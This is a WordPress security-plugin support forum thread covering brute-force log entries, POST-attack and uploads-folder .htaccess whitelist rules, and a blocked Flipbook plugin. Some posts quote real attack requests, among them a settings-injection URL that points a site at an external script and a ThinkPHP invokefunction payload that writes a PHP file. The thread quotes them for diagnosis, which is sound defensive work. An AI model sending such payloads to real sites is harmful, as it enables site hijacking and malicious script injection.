Well the brute force attack is not as big as I thought.  Yep, you can tell your site is under a brute force attack by checking the BPS Security Log.  When you see several Security Log entries being logged every second continuously then yep a brute force bot attack is occurring on your website.  The bots are hitting your Login page and your xml-rpc.php file continuously.

Ok the 3 problems are fixed and I found 1 other issue, which is your wp-config.php file was quarantined, but I checked the wp-config.php file in Quarantine and did not see any differences in the code in the file.  I assume you were manually editing your wp-config.php file or maybe another plugin or your theme was adding or removing code or just doing a flush.  If you were manually editing your wp-config.php file then you can use the AutoRestore|Quarantine Standard Procedural Steps when manually modifying files method > http://forum.ait-pro.com/forums/topic/autorestore-quarantine-guide-read-me-first/#procedural-steps or just Restore files in Quarantine after you edit them manually.

I will post the forum links to the fixes I did with additional help info in a minute.

1. The Plugin Firewall is blocking plugin .js scripts and AutoPilot Mode is not automatically whitelisting those .js scripts.

Solution:  No solution needed. Most likely since the site is currently undergoing a significant brute force attack then Plugin Firewall AutoPilot Mode may have temporarily impacted.  Plugin Firewall AutoPilot Mode is automatically creating new whitelist rules successfully.  Note:  I turned On Plugin Firewall Test Mode to speed up the process of adding any new additional Plugin Firewall whitelist rules.

2. It appears that you are using the BPS POST Attack Bonus Custom Code and need to add an additional whitelist rule for this Query String:  wc-ajax=get_refreshed_fragments

Solution:  Added the 2 new Query String whitelist rules (in bold font below) in your existing BPS POST Attack Protection Bonus Custom Code and moved the POST Attack Protection code into this Custom Code text box:  8. CUSTOM CODE WP REWRITE LOOP START.
Forum Solution Reference Link:  https://forum.ait-pro.com/forums/topic/whitelist-monarch-plugin/#post-37359

# BPS POST Request Attack Protection
RewriteCond %{REQUEST_METHOD} POST [NC]
# NEVER COMMENT OUT THIS LINE OF CODE BELOW FOR ANY REASON
RewriteCond %{REQUEST_URI} !^.*/wp-admin/ [NC]
# NEVER COMMENT OUT THIS LINE OF CODE BELOW FOR ANY REASON
RewriteCond %{REQUEST_URI} !^.*/wp-cron.php [NC]
# NEVER COMMENT OUT THIS LINE OF CODE BELOW FOR ANY REASON
RewriteCond %{REQUEST_URI} !^.*/wp-login.php [NC]
# Whitelist WP JSON POST Requests by Query String
RewriteCond %{QUERY_STRING} !^_locale=(.*) [NC]
# Whitelist the WordPress Theme Customizer
RewriteCond %{HTTP_REFERER} !^.*/wp-admin/customize.php [NC]
# Whitelist XML-RPC Pingbacks, JetPack and Remote Posting POST Requests
RewriteCond %{REQUEST_URI} !^.*/xmlrpc.php [NC]
# Whitelist Jetpack JSON POST Request
RewriteCond %{REQUEST_URI} !^.*/wp-json/jetpack/(.*) [NC]
# Whitelist Network|Multisite Signup POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/wp-signup.php [NC]
# Whitelist Network|Multisite Activate POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/wp-activate.php [NC]
# Whitelist Trackback POST Requests
RewriteCond %{REQUEST_URI} !^.*/wp-trackback.php [NC]
# Whitelist Comments POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/wp-comments-post.php [NC]
# Example 1: Whitelist Star Rating Calculator POST Form Requests
RewriteCond %{REQUEST_URI} !^.*/star-rating-calculator.php [NC]
# Example 2: Whitelist Contact Form POST Requests
RewriteCond %{REQUEST_URI} !^.*/contact/ [NC]
# Example 3: Whitelist PayPal IPN API Script POST Requests
RewriteCond %{REQUEST_URI} !^.*/ipn_handler.php [NC]
# Whitelist WooCommerce POST Request to Root URI by Query String
RewriteCond %{QUERY_STRING} !^wc-ajax=(.*) [NC]
# Whitelist WooCommerce POST Request to Root URI by Query String
RewriteCond %{QUERY_STRING} !^wc-api=(.*) [NC]
RewriteRule ^(.*)$ - [F]

3. You need to add a wp-admin htaccess file whitelist rule for the WP admin-ajax.php file and/or this Query String:  action=quick_preivew

Solution:  Added a admin-ajax.php file skip rule in BPS wp-admin Custom Code.
Forum Solution Reference Link:  https://forum.ait-pro.com/forums/topic/nextgen-gallery-pro-post-request-blocked/#post-35621

So, I noticed the quarantine as well, after the theme developer logged in a day or two ago. I forgot to tell him about BPS Pro.

I just restored the file because I figured he didn’t know about it and made a change to the file.

As for the brute force attack, it does seem big. The security log file has over 900 requests for the wp-login.php file from late this morning and it’s increased another 120k just from reading your last message!

I had copied the log and then deleted it because I noticed it was increasing in size so fast.

Feature Request? Maybe you could add a limit size to the log, that the user can set, so that in cases like this the file size doesn’t get too big.

Yep, the attack on your site is fairly big, but sometimes our forum site gets attacked for days at a rate of 1,000 attacks per second.  Luckily the way we have designed BPS Pro, it deflects all attacks instead of creating any significant resource usage for your server/website.  In other words, everything functions and performs as if the attack were not occurring at all.

That feature has already been added to the Security Log. 😉  You don’t need to do anything with the Security Log.  When the Security Log reaches the size setting that you have chosen or the default size setting then it will be automatically zipped, emailed to you and replaced with a new blank Security Log file.

Thanks for making the changes.

That feature already exists for the Security Log.  Not sure if you thought I was saying we will add that or if you understood that the Security Log already has completely automated functionality for exactly this type of scenario – ie massive brute force attacks can fill up several Security Log files in a day.

Ok, I found it. Under S-Monitor.

Thanks.

I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

[403 GET Request: 06.08.2019 - 10:15]
BPS: 3.5
WP: 5.2.2
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 159.69.154.78
Host Name: static.78.154.69.159.clients.your-server.de
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

1. Go to your website’s home page.
2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string:  nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.

httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],

Good day, BPS Pro seems to block the new plugin “Flipbook” that  I just installed. How can I allow “Flipbook” to run with BPS PRO ?

I get the “403 forbidden error page”

[New DB Table Created - Cron Check Time Monday, July 22, 2019 - 8:43 am]
New DB Table Created Name: wp_flipbook
New DB Table Actual Create Time: 2019-07-22 08:32:16
DB Monitor Guide: https://forum.ait-pro.com/forums/topic/database-monitor-dbm-guide/

Thank you

You can ignore the DB Monitor log entry.  Go to the BPS Pro Security Log page, look for the Security Log entry regarding the Flipbook 403 log entry and post it in your forum reply so I can see what is being blocked.

[403 GET Request: mardi, 6 aout, 2019 - 1:23 ]

BPS Pro: 13.4
WP: ***
Event Code: UAEGWR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/uploads-anti-exploit-guard-uaeg-read-me-first/
REMOTE_ADDR: ***********
Host Name: 77-93-55-206.static.cogecodata.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: http://www.golfdorval.com/wordpress/wp-admin/admin.php?page=flipbook_view_book&bookid=1
REQUEST_URI: /wordpress/wp-content/uploads/flipbook/1/book.html
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

What is being blocked is the book.html file in the flipbook folder: /wordpress/wp-content/uploads/flipbook/ by BPS Pro Uploads Anti-Exploit Guard (UAEG).

Go to the BPS Pro > htaccess File Editor tab page > click the “Your Current Uploads htaccess File” tab > copy the entire contents of your UAEG htaccess file and post it in your forum reply.  I will create a whitelist rule for you in your UAEG code so that you can copy and paste the modified code into the UAEG Custom Code text box.

# BULLETPROOF PRO UPLOADS FOLDER .HTACCESS
#
# BPS mod_access_compat
# Allow,Deny
# First, all Allow directives are evaluated. At least one must match, or the request is rejected.
# Next, all Deny directives are evaluated. If any matches, the request is rejected.
# Last, any requests which do not match an Allow or a Deny directive are denied by default.
#
# Deny,Allow
# First, all Deny directives are evaluated. If any match, the request is denied unless
# it also matches an Allow directive. Any requests which do not match any Allow or Deny directives are permitted.
#
# *Match* -------------------- *Allow,Deny result* -------------------- *Deny,Allow result*
# Match Allow only ----------- Request allowed ------------------------ Request allowed
# Match Deny only ------------ Request denied ------------------------- Request denied
# No match ------------------- Default to second directive: Denied ---- Default to second directive: Allowed
# Match both Allow & Deny ---- Final match controls: Denied ----------- Final match controls: Allowed
#
# NOTE: The zip file extension can be added to block remote access or execution of zip files, several plugins create
# create either temporary or permanent zip files in the uploads folder. This may block those plugins from being
# able to create zip files in your uploads folder.
#
# BEGIN WHITELIST
# Examples of whitelisting are commented out below. To create whitelist rules you would delete the # sign in front
# of the whitelist rule you want to use, add the actual filename or folder name you want to whitelist and also
# delete the # sign in front of #Allow from env=whitelist.
# Whitelist a specific js file in the uploads folder: example.js
#SetEnvIf Request_URI "example.js$" whitelist
# Whitelist an entire folder in the uploads folder: /uploads/example-folder/
#SetEnvIf Request_URI "example-folder/.*$" whitelist
# END WHITELIST
#
# FORBID THESE FILE EXTENSIONS FROM BEING ACCESSED OR EXECUTED REMOTELY
<FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z)$">
Order Allow,Deny
#Allow from env=whitelist
Deny from all
</FilesMatch>

# FORBID PHP FILES DISGUISED AS AN IMAGE FILE - example.php.jpg - example.PHP.jpg
<FilesMatch "\.(php|PHP|\.+(php)|\.+(PHP)).*$">
Order Allow,Deny
#Allow from env=whitelist
Deny from all
</FilesMatch>

1. Go to the BPS Pro > B-Core > Custom Code tab page.
2. Click the UAEG htaccess File Custom Code accordion button/tab.
3. Copy your modified UAEG htaccess code below into the CUSTOM CODE UAEG text box.
4. Click the Save UAEG Custom Code button.
5. Go to the Security Modes tab page > scroll down to the UAEG section and click the Activate button.

# BULLETPROOF PRO UPLOADS FOLDER .HTACCESS
#
# BPS mod_access_compat
# Allow,Deny
# First, all Allow directives are evaluated. At least one must match, or the request is rejected.
# Next, all Deny directives are evaluated. If any matches, the request is rejected.
# Last, any requests which do not match an Allow or a Deny directive are denied by default.
#
# Deny,Allow
# First, all Deny directives are evaluated. If any match, the request is denied unless
# it also matches an Allow directive. Any requests which do not match any Allow or Deny directives are permitted.
#
# *Match* -------------------- *Allow,Deny result* -------------------- *Deny,Allow result*
# Match Allow only ----------- Request allowed ------------------------ Request allowed
# Match Deny only ------------ Request denied ------------------------- Request denied
# No match ------------------- Default to second directive: Denied ---- Default to second directive: Allowed
# Match both Allow & Deny ---- Final match controls: Denied ----------- Final match controls: Allowed
#
# NOTE: The zip file extension can be added to block remote access or execution of zip files, several plugins create
# create either temporary or permanent zip files in the uploads folder. This may block those plugins from being
# able to create zip files in your uploads folder.
#
# BEGIN WHITELIST
# Examples of whitelisting are commented out below. To create whitelist rules you would delete the # sign in front
# of the whitelist rule you want to use, add the actual filename or folder name you want to whitelist and also
# delete the # sign in front of #Allow from env=whitelist.
# Whitelist a specific js file in the uploads folder: example.js
#SetEnvIf Request_URI "example.js$" whitelist
# Whitelist an entire folder in the uploads folder: /uploads/example-folder/
SetEnvIf Request_URI "flipbook/.*$" whitelist
# END WHITELIST
#
# FORBID THESE FILE EXTENSIONS FROM BEING ACCESSED OR EXECUTED REMOTELY
<FilesMatch "\.(7z|as|bat|bin|cgi|chm|chml|class|cmd|com|command|dat|db|db2|db3|dba|dll|DS_Store|exe|gz|hta|htaccess|htc|htm|html|htx|idc|ini|ins|isp|jar|jav|java|js|jse|jsfl|json|jsp|jsx|lib|lnk|out|php|phps|php5|php4|php3|phtml|phpt|pl|py|pyd|pyc|pyo|rar|shtm|shtml|sql|swf|sys|tar|taz|tgz|tpl|vb|vbe|vbs|war|ws|wsf|xhtml|xml|z)$">
Order Allow,Deny
Allow from env=whitelist
Deny from all
</FilesMatch>

# FORBID PHP FILES DISGUISED AS AN IMAGE FILE - example.php.jpg - example.PHP.jpg
<FilesMatch "\.(php|PHP|\.+(php)|\.+(PHP)).*$">
Order Allow,Deny
#Allow from env=whitelist
Deny from all
</FilesMatch>

ok I did the change but still the same problem, see the security log

[403 GET Request: mardi, 6 aout, 2019 - 3:21 ]
BPS Pro: 13.4
WP: ****
Event Code: UAEGWR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/uploads-anti-exploit-guard-uaeg-read-me-first/
REMOTE_ADDR: **********
Host Name: 77-93-55-206.static.cogecodata.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER: http://www.golfdorval.com/wordpress/guide-du-terrain-de-golf/?preview_id=4404&preview_nonce=96a500deed&preview=true
REQUEST_URI: /wordpress/wp-content/uploads/flipbook/2/book.html
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

Thank you

Are you sure you did all of the steps above correctly?  I tried to check your server type and it appears your server type information is being blocked/protected.  If you did all the steps correctly then maybe your host server type does not support the SetEnvIf directive. Go to the BPS Pro System Info page (under the Logs & Info main menu) and copy and paste these 2 things below.

Server Type: Apache
Operating System: Linux

ok here is the two things from system info

Server Type: Apache
Operating System: Linux

Alright so there is not a problem with the SetEnvIf directive then.  If you want me to login to your website and figure out the problem then send a WordPress Administrator login user account to:  info at ait-pro dot com. Or you can choose to deactivate the BPS Pro UAEG feature.  It’s an extra security feature that is not that important.

Ok thank you for your help.  I deactivate the PBS Pro UAEG feature. Now i don’t have the 403 error but instead of the flipbook I get the front page of the web site instead (the index page ) so I guess i will survive without the flipbook.

Thanks again for your support.